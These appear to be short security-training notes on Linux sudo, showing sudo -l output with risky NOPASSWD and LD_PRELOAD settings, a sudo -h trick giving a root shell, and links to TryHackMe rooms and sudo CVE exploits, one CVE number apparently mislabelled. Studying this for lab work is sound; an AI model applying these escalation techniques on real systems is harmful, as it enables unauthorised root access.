sudo, sudoedit — execute a command as another user
sudo -l sudo -ll sudo -V sudo -U user command
# which sudo /usr/bin/sudo # ls -la /usr/bin/sudo -rwsr-xr-x 1 root root 182600 Jan 30 08:12 /usr/bin/sudo #
Example
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
user@debian:~$
Example: sudo with -h option (run command on host)
alice@looking-glass:/tmp$ id uid=1005(alice) gid=1005(alice) groups=1005(alice) alice@looking-glass:/tmp$ cat /etc/sudoers.d/alice alice ssalg-gnikool = (root) NOPASSWD: /bin/bash alice@looking-glass:/tmp$ sudo -h ssalg-gnikool /bin/bash sudo: unable to resolve host ssalg-gnikool root@looking-glass:/tmp# id uid=0(root) gid=0(root) groups=0(root) root@looking-glass:/tmp#
Example: jenny can Ru ALL Commands As ALL Users, As ALL Groups
jenny@wir3:/$ sudo -l
sudo -l
[sudo] password for jenny: 987654321
Matching Defaults entries for jenny on wir3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jenny may run the following commands on wir3:
(ALL : ALL) ALL
jenny@wir3:/$ sudo -ll
sudo -ll
Matching Defaults entries for jenny on wir3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jenny may run the following commands on wir3:
Sudoers entry:
RunAsUsers: ALL
RunAsGroups: ALL
Commands:
ALL
jenny@wir3:/$
Practice
>>> CVE-2018-18634: pwdfeedback - https://github.com/saleemrashid/sudo-cve-2019-18634
>>> CVE-2019-18634: THM | hackerNote
>>> CVE-2021-3156: THM | Baron Samedit
>>> THM | h4cked